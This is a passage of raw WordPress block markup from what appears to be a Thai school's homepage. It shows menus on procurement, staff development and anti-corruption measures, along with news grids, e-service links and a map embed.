href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</td></tr><tr><td>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></td></tr><tr><td>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</td></tr><tr><td></td></tr><tr><td></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"stv6u8re\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_74522c-22\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_df8487-4e\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_df8487-4e\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8c5230-93\",\"tabCount\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8c5230-93 kt-tabs-has-2-tabs kt-active-tab-1 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"6fd1fd-18\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab6fd1fd-18\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"281735-c8\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab281735-c8\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:loginout /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline 